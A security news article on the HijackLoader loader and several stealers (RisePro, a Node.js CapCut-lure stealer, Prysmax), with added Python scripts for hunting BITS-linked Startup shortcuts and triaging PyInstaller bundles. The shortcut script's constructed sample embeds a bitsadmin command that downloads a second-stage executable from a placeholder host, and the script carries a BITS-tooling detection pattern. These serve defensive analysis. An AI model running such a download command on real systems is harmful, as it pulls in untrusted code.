
New HijackLoader Modular Malware Loader Making Waves within the Cybercrime World

A new malware loader called HijackLoader is gaining traction in the cybercriminal community as a means of delivering payloads such as DanaBot, SystemBC, and RedLine Stealer.

"Although HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution as it uses a modular architecture, a feature that most loaders do not have," Zscaler ThreatLabz researcher Nikolaos Pantazopoulos said.

First observed by the company in July 2023, the malware employs a number of techniques to fly under the radar. These include using syscalls to evade monitoring by security solutions, checking running processes against an embedded blocklist of security software, and delaying code execution by as much as 40 seconds at different stages.

The exact initial access vector used to infiltrate targets is currently unknown. The anti-analysis components notwithstanding, the loader packs in a main instrumentation module that facilitates flexible code injection and execution using embedded modules.

Persistence on the compromised host is achieved by creating a shortcut file (LNK) in the Windows Startup folder and pointing it to a Background Intelligent Transfer Service (BITS) job.
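The Startup-folder shortcut pattern described above can be hunted for directly. The following Python script is an added example and not code from the Zscaler write-up: it parses the .lnk files in the all-users and per-user Startup folders according to the MS-SHLLINK layout and flags any whose resolved target, relative path or arguments reference BITS tooling. It assumes the shortcut reaches BITS through bitsadmin.exe or the BITS PowerShell cmdlets (the write-up does not say how the job is referenced), and the shortcut it builds with build_sample_lnk() is constructed for the example.

```python
# Added hunting example (not from the Zscaler write-up). Shell link layout per
# MS-SHLLINK. Assumption: the loader's shortcut invokes bitsadmin.exe or a
# BITS PowerShell cmdlet; the sample shortcut below is constructed.
import os
import re
import struct
from pathlib import Path

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, IS_UNICODE = 0x10, 0x20, 0x80
BITS_PATTERN = re.compile(r"bitsadmin|-bits(transfer|file)", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return the fields of a shell link that decide what it executes."""
    hdr_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if hdr_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    pos = 0x4C
    out = {"local_base_path": "", "relative_path": "", "working_dir": "", "arguments": ""}
    if flags & HAS_ID_LIST:                      # skip the LinkTargetIDList
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # LinkInfo carries the resolved local path
        info_size, _hdr, info_flags, _vol_off, base_off = struct.unpack_from("<5I", data, pos)
        if info_flags & 0x1:                     # VolumeIDAndLocalBasePath
            start = pos + base_off
            out["local_base_path"] = data[start:data.index(b"\x00", start)].decode("cp1252", "replace")
        pos += info_size

    def read_string() -> str:                    # StringData: 2-byte char count, no terminator
        nonlocal pos
        (count,) = struct.unpack_from("<H", data, pos)
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")

    if flags & HAS_NAME:
        read_string()                            # NAME_STRING is a comment; not needed
    if flags & HAS_REL_PATH:
        out["relative_path"] = read_string()
    if flags & HAS_WORK_DIR:
        out["working_dir"] = read_string()
    if flags & HAS_ARGS:
        out["arguments"] = read_string()
    return out


def reaches_bits(fields: dict) -> bool:
    """True when the shortcut's path or arguments reference BITS tooling."""
    blob = " ".join(fields[k] for k in ("local_base_path", "relative_path", "arguments"))
    return BITS_PATTERN.search(blob) is not None


def startup_folders() -> list:
    """The all-users and current-user Startup folders on a live Windows host."""
    program_data = os.environ.get("ProgramData", r"C:\ProgramData")
    app_data = os.environ.get("APPDATA", "")
    return [
        Path(program_data) / "Microsoft/Windows/Start Menu/Programs/StartUp",
        Path(app_data) / "Microsoft/Windows/Start Menu/Programs/Startup",
    ]


def scan_startup(folders=None) -> list:
    """Return (path, fields) for every Startup shortcut that reaches BITS."""
    hits = []
    for folder in (folders or startup_folders()):
        for lnk in Path(folder).glob("*.lnk"):
            try:
                fields = parse_lnk(lnk.read_bytes())
            except (ValueError, struct.error, IndexError):
                continue                         # malformed or truncated shortcut
            if reaches_bits(fields):
                hits.append((str(lnk), fields))
    return hits


def build_sample_lnk(local_path: str, args: str) -> bytes:
    """Constructed sample: a minimal LNK with a LinkInfo local path and arguments."""
    flags = HAS_LINK_INFO | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + bytes(0x4C - 24)
    volume = struct.pack("<4I", 0x11, 3, 0, 0x10) + b"\x00"   # DRIVE_FIXED, empty label
    base = local_path.encode("cp1252") + b"\x00"
    hdr = 0x1C
    base_off = hdr + len(volume)
    suffix_off = base_off + len(base)
    link_info = struct.pack("<7I", suffix_off + 1, hdr, 0x1, hdr, base_off, 0, suffix_off)
    link_info += volume + base + b"\x00"        # empty CommonPathSuffix
    return header + link_info + struct.pack("<H", len(args)) + args.encode("utf-16-le")


if __name__ == "__main__":
    sample = build_sample_lnk(r"C:\Windows\System32\bitsadmin.exe",
                              "/transfer upd /download /priority foreground "
                              "http://example.invalid/stage2 C:\\Users\\Public\\stage2.exe")
    fields = parse_lnk(sample)
    print(fields, reaches_bits(fields))
    for path, hit in scan_startup():
        print("suspicious Startup shortcut:", path, hit)
```

Run it on the host as a user who can read both Startup folders, and pair any hit with the BITS job list (Get-BitsTransfer -AllUsers in an elevated PowerShell) to see what the job fetches and what it runs on completion. A shortcut that resolves its target only through the LinkTargetIDList, with no LinkInfo and no arguments, comes back with empty fields; that is itself worth a manual look.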


"HijackLoader is a modular loader with evasion techniques, which provides a variety of loading options for malicious payloads," Pantazopoulos said. "Moreover, it does not have any advanced features and the quality of the code is poor."

The disclosure comes as Flashpoint shared details of an updated version of an information-stealing malware called RisePro that was previously distributed via a pay-per-install (PPI) malware downloader service dubbed PrivateLoader.

"The seller claimed in their ads that they have taken the best aspects of 'RedLine' and 'Vidar' to make a powerful stealer," Flashpoint noted. "And this time, the seller also promises a new advantage for users of RisePro: customers host their own panels to ensure logs are not stolen by the sellers."

RisePro, written in C++, is designed to harvest sensitive information from infected machines and exfiltrate it to a command-and-control (C&C) server in the form of logs. It was first offered for sale in December 2022.


It also follows the discovery of a new information stealer written in Node.js that is packaged into an executable and distributed via malicious Large Language Model (LLM)-themed Facebook ads and bogus websites impersonating ByteDance's CapCut video editor.

"When the stealer is executed, it runs its main function that steals cookies and credentials from several Chromium-based web browsers, then exfiltrates the data to the C&C server and to the Telegram bot," security researcher Jaromir Horejsi said.

"It also subscribes the client to the C&C server running GraphQL. When the C&C server sends a message to the client, the stealing function will run again." Targeted browsers include Google Chrome, Microsoft Edge, Opera (and OperaGX), and Brave.

This is the second time fake CapCut websites have been observed delivering stealer malware. In May 2023, Cyble uncovered two different attack chains that used the software as a lure to trick unsuspecting users into running Offx Stealer and RedLine Stealer.


The developments paint a picture of a constantly evolving cybercrime ecosystem, with stealer infections acting as a primary initial attack vector used by threat actors to infiltrate organizations and conduct post-exploitation actions.

It is therefore not surprising that threat actors are jumping on the bandwagon to spawn new stealer malware strains such as Prysmax that pack a Swiss Army knife of functionality, enabling their customers to maximize their reach and impact.

"The Python-based malware is packed using PyInstaller, which can be used to bundle the malicious code and all its dependencies into a single executable," Cyfirma said. "The information-stealing malware is focused on disabling Windows Defender, manipulating its settings, and configuring its own response to threats."

"It also attempts to reduce its traceability and maintain a foothold on the compromised system. The malware appears to be well designed for data theft and exfiltration, while evading detection by security tools as well as dynamic analysis sandboxes."
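Recognising a PyInstaller bundle is the first triage step for a sample like Prysmax, because the Python version and the names of the embedded scripts fall out of the archive trailer without executing anything. The script below is an added example, not Cyfirma's code: it locates the CArchive cookie that PyInstaller appends to the executable (the MEI magic followed by the package length, table-of-contents offset and length, Python version and library name), walks the table of contents, and reports the entries. The archive layout is the one PyInstaller has used since version 2.1; the binary built by build_sample_exe() is constructed for the example.

```python
# Added triage example (not Cyfirma's code). Archive facts (MEI magic,
# "!8siiii64s" cookie, "!iIIIBc" TOC entry head) are PyInstaller's CArchive
# layout for version 2.1 and later; the sample executable below is constructed.
import struct

PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE = struct.Struct("!8siiii64s")     # magic, pkg_len, toc_pos, toc_len, pyver, pylib
TOC_HEAD = struct.Struct("!iIIIBc")      # entry_size, data_pos, csize, usize, cflag, type
ENTRY_TYPES = {b"s": "script", b"z": "pyz", b"m": "module", b"M": "package",
               b"b": "binary", b"x": "data", b"o": "option"}


def inspect_pyinstaller(data: bytes):
    """Return archive metadata if `data` is a PyInstaller executable, else None."""
    idx = data.rfind(PYINST_MAGIC)           # the cookie is the last thing in the archive
    if idx < 0 or len(data) - idx < COOKIE.size:
        return None
    _magic, pkg_len, toc_pos, toc_len, pyver, pylib = COOKIE.unpack_from(data, idx)
    archive_start = idx + COOKIE.size - pkg_len
    if archive_start < 0:
        return None
    # pyver is 27 / 36 for 2.7 / 3.6 and 310 / 311 for 3.10 / 3.11
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)
    entries = []
    pos, end = archive_start + toc_pos, archive_start + toc_pos + toc_len
    while pos + TOC_HEAD.size <= end:
        entry_size, data_pos, _csize, usize, cflag, etype = TOC_HEAD.unpack_from(data, pos)
        if entry_size <= 0:
            break                            # corrupt TOC; stop rather than loop forever
        name = data[pos + TOC_HEAD.size:pos + entry_size].rstrip(b"\x00")
        entries.append({"name": name.decode("utf-8", "replace"),
                        "type": ENTRY_TYPES.get(etype, etype.decode()),
                        "compressed": bool(cflag), "size": usize,
                        "offset": archive_start + data_pos})
        pos += entry_size
    return {"python": f"{major}.{minor}",
            "pylib": pylib.rstrip(b"\x00").decode("utf-8", "replace"),
            "entries": entries,
            "scripts": [e["name"] for e in entries if e["type"] == "script"]}


def build_sample_exe(entries, pyver=311, pylib=b"python311.dll") -> bytes:
    """Constructed sample: a fake PE stub followed by a minimal CArchive."""
    blobs, toc = b"", b""
    for name, etype, payload in entries:
        name_b = name.encode() + b"\x00"
        name_b += b"\x00" * (-(TOC_HEAD.size + len(name_b)) % 16)   # pad entry to 16
        toc += TOC_HEAD.pack(TOC_HEAD.size + len(name_b), len(blobs),
                             len(payload), len(payload), 0, etype) + name_b
        blobs += payload
    pkg_len = len(blobs) + len(toc) + COOKIE.size
    cookie = COOKIE.pack(PYINST_MAGIC, pkg_len, len(blobs), len(toc), pyver, pylib)
    return b"MZ" + bytes(62) + blobs + toc + cookie


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(inspect_pyinstaller(fh.read()))
    else:
        sample = build_sample_exe([("pyiboot01_bootstrap", b"s", b"\x00" * 16),
                                   ("main", b"s", b"print('hi')\n"),
                                   ("PYZ-00.pyz", b"z", b"PYZ\x00" * 8)])
        info = inspect_pyinstaller(sample)
        print(info["python"], info["pylib"], info["scripts"])
        print(inspect_pyinstaller(b"MZ" + bytes(512)))
```

Pass a real file as the first argument to inspect it. Entries of type script are the original top-level .py files (stored as compiled code rather than source), and the pyz entry holds the bundled modules; the script names alone often give away the sample's lineage before anything is unpacked. Bundles from PyInstaller 2.0 use a 24-byte cookie without the library name and are not handled here.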
